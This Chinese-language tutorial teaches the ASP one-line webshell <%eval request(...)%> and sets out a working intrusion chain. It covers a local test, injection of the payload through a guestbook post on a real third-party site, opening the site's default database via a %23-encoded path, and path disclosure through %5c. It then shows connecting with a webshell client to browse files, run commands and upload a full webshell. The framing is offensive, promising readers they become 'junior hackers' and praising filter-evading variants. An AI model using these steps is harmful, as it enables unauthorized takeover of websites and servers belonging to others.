一句话可以干什么?你可能会说微不足道,也可能会说对人的一生产生久远的影响。那么,一句话对一个网站来说意味着什么?我说,可能是一场飞来横祸,你信吗?下面听我一一道来。
我们今天要谈到的一句话,是一句简短的asp代码,这段代码要是存在于服务器上的网站目录内的任意一个asp动态网页文件内,那么这个网站就将成为黑客的囊中之物了。通过连接这一句话,黑客就可以对网站执行任意操作,比如上传,下载,执行CMD命令,获取管理员密码,修改注册表等等。
大家都用过木马的吧?要先生成一个客户端,然后把那个生成好的exe文件发给别人,当他运行之后,在你的控制端里面就会显示有主机上线了。我们今天讲的原理和这个有点像,不过我们要控制的是一个网站,而不是PC机。一句话的写法主流是两种,一种是<%execute request("value")%>,还有一种是<%eval request("value")%>。前一种的功能比较有限,我今天讲解后一种一句话的使用。
(一)本地实习
上面我们说了,只要服务器上的任意一个asp网页文件内容里包含这一句话,在本地我只要打开一句话木马客户端连接上去,就能控制这个网站了。用到的连接工具是——Lake2的一句话客户端汉化版,这个汉化版是我自己翻译的哦,网上下载不到^_^。
第一步:搭建asp服务器
说到服务器的搭建,可能很多小菜看到这儿就开始打退堂鼓了,其实很简单,用到一个叫“紫雨轩ASP Web 服务器”的软件。下载软件,运行,可以看到如图1的界面************。
我们要先选择ASP服务运行的路径,点击界面上的“参数设置”按钮,出现参数设置的界面,我点击“根目录”右边的“..”按钮,选中了桌面上的“www”文件夹作为网站根目录,再点“保存”回到程序主界面(如图2)*************。点击最左边的那个“启动服务”按钮,OK。
第二步:写入一句话
ASP服务器搭建好了,我打开桌面上的“www”文件夹,新建一个txt文件,用记事本打开,写入一句话的内容<%eval request("123")%>,保存,再将名字改为bwl.asp(如图3)*************。
小提示:为什么<%eval request("value")%>变成了<%eval request("123")%>呢?””中的是连接密码,随自己高兴。保存为bwl.asp的时候,系统会提示你后缀名确定修改吗,点击“是”。
第三步:连接一句话
含有一句话的asp文件准备好了,我们打开Lake2的一句话客户端汉化版,界面如图4所示*****************,这是一个htm网页文件。由于我们本地搭建好了ASP服务器了,在“ASP地址”后面就填入“
http://localhost/bwl.asp”,“登录密码”后面写“123”。“功能”后面是一个下拉列表,里面有很多功能(如图5)****************。
小提示:因为是本地服务器,所以填localhost,也可以写127.0.0.1,如果是外网的话就要写网址了,比如
http://www.qq.com/bwl.asp。
第四步:测试功能
选择下拉列表里的“本地磁盘”,然后点“发送”按钮,大家就可以看到如图6的样子*************。
服务器(也就是我这台电脑)的磁盘信息出来了,同样的,选择“文件列表”,点“发送”按钮,就能够查看服务器上的所有文件了(如图7)************。其他的功能我就不赘述了,大家自己摸索,可以上传、下载文件,让服务器从某个指定的URL上下载木马并运行,删除、复制文件等等。
小提示:黑客有的时候连接上一句话后,以此为跳板,用上传文件功能上传一个Webshell,更方便地控制服务器。
(二)实战前的讲解
那我们现在就要把眼光放开了,要把这个用来对付真正的网站了。在这一部分,我来讲解下如何利用一句话,它的插入方法和插入地址的确定。我们作为访客,而不是网站管理员,唯一能操作的文件就是数据库。为什么这么说呢?我们在论坛里注册用户、发帖子,这些数据都会被网页程序提交到网站的后台数据库中进行存储,如果我们在帖子里写入一句话后提交,或是在注册用户的时候,在注册资料里写入一句话,那么一句话也会被送到数据库里。我们没有能力在网站的“表面”上编辑其他的asp文件,只有权对数据库进行更新。
小提示:一句话为什么现在对很多的论坛失去作用?因为网页在把帖子的内容提交到数据库的时候过滤掉了危险字符,比如“<%”,所以提交到数据库的一句话已经“废”掉了。
一句话提交进了数据库文件,那么下面要做的一件事情就是找出数据库的地址,这样,我们的一句话客户端才能找到一句话并成功连接。
一般的,通过一句话入侵网站,有我讲述的如下几个入侵思路:
①通过发帖、留言、注册等方法写入一句话,然后通过暴库漏洞,找出网站的数据库所在地址。
②写入一句话后,根据网站程序的默认数据库来进行连接。
③首先上传一个txt文件,里面写入一句话的代码,想办法得到论坛管理员密码,进入后台,通过文件管理,把txt后缀改为asp。与这种方法搭配的常用手段为注入,我在二月刊上有过讲解指定网站的注入方法。
小提示:什么是暴库?比如一个网址,
www.xxx.com/bbs/index.asp,你将其改为
www.xxx.com/bbs%5cindex.asp并提交,浏览器会告诉你“找不到文件’f:\inputweb\data\shujuku.asp’。”。这就说明该网站存在暴库漏洞,真正的数据库物理路径就是f:\inputweb\bbs\data\shujuku.asp,数据库的网页地址则是
www.xxx.com/bbs/data/shujuku.asp。
(三)远程入侵
第一步:我这次选择的对象是
www.xxxxx.com/bbs/index.asp 这个地址,这是一个网站的留言版,这个网站还是很权威的噢(如图8)**************。
不过,网址这次我不能明写,前几次我网址都明写的,一些FANS就乱来,把我示例的网站搞得乱七八糟,做人要厚道啊!我们要做两件事情,一件是插入一句话,一件是获得数据库地址。获得数据库地址很关键,不然我们无法知道一句话插到哪个ASP文件里面去了。
第二步:首先我尝试了暴库,没有成功搞出数据库路径,我向下看,发现网页的最底下有一些信息:design by ★寒冰★ QQ:51632561 designlife online All Rights Reserved。处于职业习惯,百度了一下这些信息,发现这套系统的名字是“设计人生(designlife V1.5)留言系统”,这套留言系统的默认数据库地址是网站根目录下的data文件夹里的#lifedata.asp。好,试试看,在浏览器里提交
www.xxxxx.com/bbs/data/%23lifedata.asp,看到了如图9*************所示的页面,数据库被打开了。
小提示:#为什么变成了%23呢?数据库前面加上了#是网站程序作者防止远程用户访问做的处理,%23是#的URL编码,这样就可以访问了,而浏览器的解释结果是一样的。
第三步:看来网站管理员很懒,连默认数据库的地址都没有改,我们下面来写入一句话。这个留言本对留言过滤不严格,所以造成我们的一句话可以成功写入。点击首页上的“我要留言”按钮,进入了留言签写地址
www.xxxx.com/bbs/add.asp。在主题和内容上都写入一句话(如图10)**********,然后点“提交”发表留言。现在好了,我们的一句话进数据库了,密码是bwl。
第四步:打开Lake2的一句话客户端汉化版,在“ASP地址”后面填“
http://www.xxxx.com/bbs/data/%23lifedata.asp”,“登录密码”后面写“bwl”。下面就像我一开始讲的本地操作一样了,这个网站已经被你控制了。如果你觉得这样控制太麻烦,你也可以以此为跳板,上传功能强大的Webshell文件,下面我来讲下操作。
第五步:选中“功能”右边列表中的“本地磁盘”,点发送,来查看网站的物理路径,根据侦测,我发现网站位于服务器的F:\wwwroot文件夹里,大家自己看具体情况而定。然后选中“功能”右边列表中的“上传文本”,下面会出现文本上传窗口,填入相对应的数据。我把一个Webshell文件用记事本打开,把里面的代码全部复制到客户端的文本框里(如图11)************,我这里用的Webshell代码会提供给大家下载。点击“发送”按钮,客户端会提示文本文件上传成功了,那么
http://www.xxxx.com/bbs/test.asp就是Webshell的地址了。
[img]http://www.hxhack.com/bbs/attachment/19_2_566546cccaacb77.jpg[/img]
后记:一句话是不是很可怕呢?除非是超主流的网站系统,一般网站都会存在一句话的插入危险,一句话可谓是无孔不入啊。学会了一句话的运用,你就可以算是一个准小黑了。其实一句话的变形加密写法其实还有很多,加密后的一句话可以躲过网站系统的过滤且不影响连接,据我所知,就有一种一句话的变形形式99%的网站系统都无法过滤,百插不爽噢。
注:该文是为了方便菜鸟学习一句话的使用而写的,没什么技术含量,高手看后莫笑。
微博帐号登录